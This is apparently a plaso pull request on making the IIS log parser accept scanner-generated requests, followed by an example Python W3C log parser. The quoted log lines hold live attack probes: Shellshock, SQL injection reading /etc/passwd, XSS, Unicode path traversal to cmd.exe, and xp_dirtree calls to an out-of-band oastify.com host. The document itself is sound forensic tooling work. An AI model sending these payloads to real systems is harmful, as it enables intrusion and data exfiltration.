
Further IIS parsing improvements #4921

Open: pyllyukko wants to merge 1 commit into log2timeline:main from pyllyukko:iis-improvements

Conversation

@pyllyukko
Contributor

Ran a few scanners against vanilla IIS running in Windows Server 2022 and made sure everything parses.

Details:

Iteration 1

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 20 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.* - 80 - 10.0.2.15
                     Mozilla/5.0+(W..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/evidences/u_ex241111.log
--------------------------------------------------------------------------------

Add * to _URI_SAFE_CHARACTERS.

Iteration 2

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 49 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.php~ - 80 - 10.0.2.15
                     Mozilla/5.0..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add ~ to _URI_SAFE_CHARACTERS.

Iteration 3

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 179 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.bat|dir - 80 - 10.0.2.15
                     Mozilla/..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add | to _URI_SAFE_CHARACTERS.

Iteration 4

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 802 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     ()+{+:;+};+echo+93e4r0-C..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 ()+{+:;+};+echo+93e4r0-CVE-2014-6271:+true;echo;echo; ()+{+_;+}+>_[$($())]+{+echo+93e4r0-CVE-2014-6278:+true;+echo;echo;+} 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                        cs(Referer)                                                          sc-status sc-substatus sc-win32-status time-taken
  • Add []<>{}$ to _URI_SAFE_CHARACTERS
    • Remove [] from _UA
    • Remove $ from _URI_STEM
    • Remove {} from _COOKIE
    • Remove {}|, ~[], <> & $ from _QUERY

Iteration 5

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1328 "2024-11-11 18:59:21
                     10.0.2.15 GET
                     /site/'+UNION+ALL+SELECT+FileToClob('/etc/p..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /site/'+UNION+ALL+SELECT+FileToClob('/etc/passwd','server')::html,0+FROM+sysusers+WHERE+username=USER+--/.html -            80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
date       time     s-ip      cs-method cs-uri-stem                                                                                                    cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added \' to _URI_SAFE_CHARACTERS
    • Remove \' from _QUERY

Iteration 6

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1517 "2024-11-11 18:59:21
                     10.0.2.15 GET /<script>alert("xss")</script>/index.html
                     -..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------
  • Added " to _URI_SAFE_CHARACTERS
    • Removed " from _COOKIE
    • Removed " from _QUERY

Iteration 7

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1546 "2024-11-11 18:59:21
                     10.0.2.15 GET /chat/!nicks.txt - 80 - 10.0.2.15
                     Mozilla/5..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ! to _URI_SAFE_CHARACTERS

Iteration 8

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 2555 "2024-11-11 18:59:21
                     10.0.2.15 GET /forum.asp
                     n=%60/etc/passwd%60|41|80040e14|..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

date       time     s-ip      cs-method cs-uri-stem cs-uri-query                                                                                                                s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-11-11 18:59:21 10.0.2.15 GET       /forum.asp  n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;. 80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
  • Added "`" to _URI_SAFE_CHARACTERS
    • Removed it from _QUERY
  • Added # to _URI_SAFE_CHARACTERS

Iteration 9

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 3215 "2024-11-11 18:59:21
                     10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe
                     /c+d..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe /c+dir 80 - 10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 0

Added À¯ to _URI_SAFE_CHARACTERS

Iteration 10

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6417 "2024-11-11 18:59:21
                     10.0.2.15 GET /administraçao.php - 80 - 10.0.2.15
                     Mozill..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ç to _URI_SAFE_CHARACTERS

Iteration 11

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6443 "2024-11-11 18:59:21
                     10.0.2.15 GET /adminisztrátora.php - 80 - 10.0.2.15
                     Mozi..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ¡ to _URI_SAFE_CHARACTERS

Iteration 12

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8170 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0;declare+@q+varchar(99);set+@q='\\4w1vx73x693ltlawm13122r0wr2kqae14pzcp0e.oasti'+'fy.com\inx';+exec+master.dbo.xp_dirtree+@q;-- -           200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                                                                                                        cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added @\\ to _UA

Iteration 13

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8209 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 https://example.com/;declare+@q+varchar(99);set+@q='\\y21p319rc39fzfgqsv9v8wxu2l8ew4kvaj56wul.oasti'+'fy.com\zmv';+exec+master.dbo.xp_dirtree+@q;-- 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                         cs(Referer)                                                                                                                                         sc-status sc-substatus sc-win32-status time-taken
  • Moved @\\ to _URI_SAFE_CHARACTERS
    • Removed from _UA, _COOKIE & _QUERY

Everything parses now.

************************* Events generated per parser **************************
Parser (plugin) name : Number of events
--------------------------------------------------------------------------------
            filestat : 3
              winiis : 8312
               Total : 8315
--------------------------------------------------------------------------------

@joachimmetz
Member

@pyllyukko thanks for flagging, I'll take a closer look when time permits.

Added ç to _URI_SAFE_CHARACTERS

This looks like IIS handling Unicode characters in a non-URI-safe manner; adding individual characters is going to be a whack-a-mole approach.
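The iteration list above widens a per-field character whitelist one character at a time, and the reply above calls that approach whack-a-mole. The following is an added example, not plaso's winiis parser and not code from this PR: it parses IIS W3C extended logs positionally from the #Fields directive, so a field value may contain anything except a literal space and no character class is needed. The sample log lines are reconstructed and shortened from the requests quoted in the PR; the raw byte pair C0 AF stands in for the `..À¯..` shown on the page, on my assumption that it is the overlong-encoded slash rendered as Latin-1. All function and constant names are mine.

```python
"""Positional parser for IIS W3C extended log files.

Added example, not code from plaso or from this PR. Data lines are split
using the #Fields directive instead of per-field character classes, so the
scanner payloads quoted in the PR (asterisk, tilde, pipe, brackets, braces,
quotes, backtick, hash, at-sign, backslash, accented letters and raw
non-UTF-8 bytes) need no whitelist entries.
"""
import datetime
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample: a directive block in the layout IIS writes, followed by
# request lines reconstructed (and shortened) from the PR's quoted scanner hits.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-11-11 18:59:21
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-11-11 18:59:21 10.0.2.15 GET /1UNkBV0Q.* - 80 - 10.0.2.15 Mozilla/5.0+(Windows+NT+10.0) - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET /1UNkBV0Q.bat|dir - 80 - 10.0.2.15 Mozilla/5.0 - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET / - 80 - 10.0.2.15 ()+{+:;+};+echo+test;echo;echo; ()+{+_;+}+>_[$($())]+{+echo+test;+} 200 0 0 0
2024-11-11 18:59:21 10.0.2.15 GET /<script>alert("xss")</script>/index.html - 80 - 10.0.2.15 Mozilla/5.0 - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET /forum.asp n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver] 80 - 10.0.2.15 Mozilla/5.0 - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET /administraçao.php - 80 - 10.0.2.15 Mozilla/5.0 - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET / - 80 - 10.0.2.15 Mozilla/5.0+Firefox/128.0 https://example.com/;declare+@q+varchar(99);set+@q='\\host.example\x';+exec+master.dbo.xp_dirtree+@q;-- 200 0 0 0
"""

# Constructed raw line carrying the overlong-encoded slash (bytes C0 AF) that the
# PR renders as "..À¯.."; reading such a file as strict UTF-8 would raise.
SAMPLE_RAW_LINE = (
    b"#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken\n"
    b"2024-11-11 18:59:21 10.0.2.15 GET /certsrv/..\xc0\xaf../winnt/system32/cmd.exe /c+dir 80 - 10.0.2.15 Mozilla/5.0 - 404 0 2 0\n"
)


@dataclass
class IISRecord:
    line_number: int
    fields: Dict[str, str]               # raw values exactly as logged
    timestamp: Optional[datetime.datetime]


def _timestamp(fields: Dict[str, str]) -> Optional[datetime.datetime]:
    """Combine date and time; the W3C format IIS writes records UTC."""
    date, time = fields.get("date"), fields.get("time")
    if not date or not time:
        return None
    try:
        naive = datetime.datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return None
    return naive.replace(tzinfo=datetime.timezone.utc)


def decode_logged_value(value: str) -> str:
    """Undo IIS field encoding: '-' means empty and '+' stands for a space."""
    return "" if value == "-" else value.replace("+", " ")


def decoded_uri(record: IISRecord) -> str:
    """Stem plus query, percent-decoded (e.g. %60 -> backtick) for matching.
    '+' is left alone here because in a query it may be a literal plus."""
    stem = record.fields.get("cs-uri-stem", "-")
    query = record.fields.get("cs-uri-query", "-")
    return unquote(stem if query == "-" else f"{stem}?{query}")


def parse_iis_w3c(text: str) -> Tuple[List[IISRecord], List[str]]:
    """Parse W3C extended log text; returns (records, warnings)."""
    field_names: List[str] = []
    records: List[IISRecord] = []
    warnings: List[str] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        if line.startswith("#"):
            # IIS writes a new directive block when the log rolls over or the
            # configured fields change, so #Fields may legitimately recur.
            if line.startswith("#Fields:"):
                field_names = line[len("#Fields:"):].split()
            continue
        if not field_names:
            warnings.append(f"line {lineno}: data before any #Fields directive")
            continue
        # IIS never writes a literal space inside a field (it logs '+' instead),
        # so one split on spaces recovers every field whatever it contains.
        tokens = line.split(" ")
        if len(tokens) != len(field_names):
            warnings.append(
                f"line {lineno}: expected {len(field_names)} fields, got {len(tokens)}")
            continue
        fields = dict(zip(field_names, tokens))
        records.append(IISRecord(lineno, fields, _timestamp(fields)))
    return records, warnings


def parse_iis_w3c_bytes(data: bytes) -> Tuple[List[IISRecord], List[str]]:
    """Decode as UTF-8 (the IIS default) but keep undecodable bytes as
    surrogate escapes, so evidence like C0 AF survives and re-encodes exactly."""
    return parse_iis_w3c(data.decode("utf-8", errors="surrogateescape"))


if __name__ == "__main__":
    recs, warns = parse_iis_w3c(SAMPLE_LOG)
    for rec in recs:
        print(rec.timestamp, rec.fields["c-ip"], rec.fields["cs-method"], decoded_uri(rec))
    print(f"{len(recs)} records, {len(warns)} warnings")
```

The field-count check is the safety net: a line that does not match the current #Fields directive is reported with its line number instead of being silently misparsed, which is the behaviour a timeline tool needs when a scanner has stuffed shell metacharacters, quotes or invalid UTF-8 into a request. Percent-decoding is kept separate from the '+' decoding because the two are not interchangeable in a query string.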
